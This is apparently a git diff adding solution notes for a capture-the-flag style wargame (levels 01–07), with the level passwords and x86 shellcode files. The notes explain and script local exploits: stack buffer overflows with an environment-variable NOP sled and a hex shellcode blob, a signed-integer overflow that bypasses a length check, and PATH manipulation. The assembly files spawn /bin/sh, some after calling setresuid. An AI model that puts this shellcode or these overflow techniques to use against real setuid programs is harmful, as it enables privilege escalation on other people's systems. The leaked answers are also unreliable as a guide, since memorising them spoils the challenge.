diff options
-rw-r--r-- | level01 | 2 | ||||
-rw-r--r-- | level02 | 8 | ||||
-rw-r--r-- | level03 | 4 | ||||
-rw-r--r-- | level04 | 7 | ||||
-rw-r--r-- | level05 | 4 | ||||
-rw-r--r-- | level06 | 22 | ||||
-rw-r--r-- | level07 | 15 | ||||
-rw-r--r-- | shellcode/exec-reloc-nozero.S | 10 | ||||
-rw-r--r-- | shellcode/exec-reloc.S | 11 | ||||
-rw-r--r-- | shellcode/exec-suid.S | 21 | ||||
-rw-r--r-- | shellcode/exec-suid.asm | 19 | ||||
-rw-r--r-- | shellcode/exec.S | 8 | ||||
-rw-r--r-- | shellcode/exec.asm | 8 |
13 files changed, 139 insertions, 0 deletions
@@ -0,0 +1,2 @@ +just disassemble it +level02 XNWFtWKWHhaaXoKI @@ -0,0 +1,8 @@ +level2: +abs(0x80000000) = 0x80000000 is still negative +0x80000000/(-1) will trigger a division exception + +level2_alt: +note that NAN is not smaller or higher than any number + +level03 OlhCmdZKbuzqngfz @@ -0,0 +1,4 @@ +just a buffer overflow +note that if the input is too long, it'll override the value of argv, which will cause a segfault when trying to get the value of argv[1] + +level04 7WhHa5HWMNRAYl9T @@ -0,0 +1,7 @@ +level04: +just modify $PATH + +level04_alt: +the IFS attack seems not working, someone said using shellshock + +level05 DNLM3Vu0mZfX0pDd @@ -0,0 +1,4 @@ +buffer overflow, stack is randomized, put shellcode after return address and pad nops +shellcode: should use setresuid first + +level06 fQ8W8YlSBJBWKV2R @@ -0,0 +1,22 @@ +考虑到栈地址随机化,而 +struct UserRecord{ + char name[40]; + char password[32]; + int id; +}; +只有72字节的空间可供攻击者填写,因此考虑将shellcode置于环境变量中。 +经过调试发现,环境变量放在 0xc0000000 之前的区域中,假设原环境变量共有 X 字节,则只要在环境变量中写一段 ``X字节nop + shellcode + X字节nop``,把栈溢出的返回地址改写为 +0xc0000000 - 2X - size(shellcode),那么便可以执行环境变量中的 shell code. 通过 ``env | wc -c`` 可看出环境变量小于 512 字节,让 X 为 512 即可。 +此外 greeting 到 ebp 处的距离为 0x48 字节,加上 old ebp 和返回地址为 0x50 = 80 字节,而我们只能往 UserRecord 写 72 字节,因此需要将 LANG 设为 fr 或 de 使得 greeting 开头更长一些。 + +r2 malloc://2048 +[0x00000000]> 512 wxs 90 +[0x00000200]> wxs 31c004c9cd8089c389c189c231c004d0cd8031c0040bbb1f43583081f33030303053682f62696e89e331c931d2cd80 +[0x0000022f]> 512 wxs 90 +[0x0000042f]> wtf /tmp/shell.bin 0x42f @ 0 + +export A=`cat /tmp/shell.bin` +export LANG=de +/levels/level06 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `printf '0123456789012345678901234\xc0\xfb\xff\xbfaaaaa'` + +level07 U3A6ZtaTub14VmwV @@ -0,0 +1,15 @@ +注意以下代码中 count 是有符号数,只要使 count 为负数,而 count * sizeof(int) 为一个比较小的整数,则既能绕过 count >= 10 的检测,又能使程序正常运行:: + + int count = atoi(argv[1]); + int buf[10]; + if(count >= 10 ) + return 1; + memcpy(buf, argv[2], count * sizeof(int)); + +经过逆向,buf 的地址是 ebp-0x48,count 的地址是 ebp-0xc,因此一共需要写 0x40 字节。我们让 count = 0x80000000 | (0x40 / sizeof(int)) = 0x80000010 = -2147483632 即可。 + +顺便说一下,这关通过的条件是 count == 0x574f4c46,就是字符串 FLOW,暗示了是整数溢出。 + +/levels/level07 -2147483632 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abFLOW + +level8 VSIhoeMkikH6SGht diff --git a/shellcode/exec-reloc-nozero.S b/shellcode/exec-reloc-nozero.S new file mode 100644 index 0000000..f5e2765 --- /dev/null +++ b/shellcode/exec-reloc-nozero.S @@ -0,0 +1,10 @@ +.global _start +_start: + xorl %eax,%eax + addb $11, %al + movl $0x3058431f, %ebx + xorl $0x30303030, %ebx # "/sh\0" + pushl %ebx + pushl $0x6e69622f # "/bin" + movl %esp, %ebx + int $0x80 diff --git a/shellcode/exec-reloc.S b/shellcode/exec-reloc.S new file mode 100644 index 0000000..077babb --- /dev/null +++ b/shellcode/exec-reloc.S @@ -0,0 +1,11 @@ +.global _start +_start: +movl $11, %eax +call next +next: +movl (%esp), %ebx +addl $(_cmd-next), %ebx +int $0x80 +_cmd: +.ascii "/bin/sh" +.byte 0 diff --git a/shellcode/exec-suid.S b/shellcode/exec-suid.S new file mode 100644 index 0000000..94ec68a --- /dev/null +++ b/shellcode/exec-suid.S @@ -0,0 +1,21 @@ +.global _start +_start: + xorl %eax, %eax + addb $201, %al # geteuid + int $0x80 + movl %eax, %ebx + movl %eax, %ecx + movl %eax, %edx + xorl %eax, %eax + addb $208, %al # setresuid + int $0x80 + xorl %eax, %eax + addb $11, %al + movl $0x3058431f, %ebx + xorl $0x30303030, %ebx # "/sh\0" + pushl %ebx + pushl $0x6e69622f # "/bin" + movl %esp, %ebx + xorl %ecx, %ecx + xorl %edx, %edx + int $0x80 diff --git a/shellcode/exec-suid.asm b/shellcode/exec-suid.asm new file mode 100644 index 0000000..b978195 --- /dev/null +++ b/shellcode/exec-suid.asm @@ -0,0 +1,19 @@ +xor eax, eax +add al, 201 +int 0x80 +mov ebx, eax +mov ecx, eax +mov edx, eax +xor eax, eax +add al, 208 +int 0x80 +xor eax, eax +add al, 11 +mov ebx, 0x3058431f +xor ebx, 0x30303030 +push ebx +push 0x6e69622f +mov ebx, esp +xor ecx, ecx +xor edx, edx +int 0x80 diff --git a/shellcode/exec.S b/shellcode/exec.S new file mode 100644 index 0000000..660057b --- /dev/null +++ b/shellcode/exec.S @@ -0,0 +1,8 @@ +.global _start +_start: +movl $11, %eax +leal _cmd, %ebx +int $0x80 +_cmd: +.ascii "/bin/sh" +.byte 0 diff --git a/shellcode/exec.asm b/shellcode/exec.asm new file mode 100644 index 0000000..ca8960d --- /dev/null +++ b/shellcode/exec.asm @@ -0,0 +1,8 @@ +mov al, 0x70 +sub al, 0x65 +mov ebx, 0x30584361 +xor ebx, 0x3030304e +push ebx +push 0x6e69622f +mov ebx, esp +int 0x80 |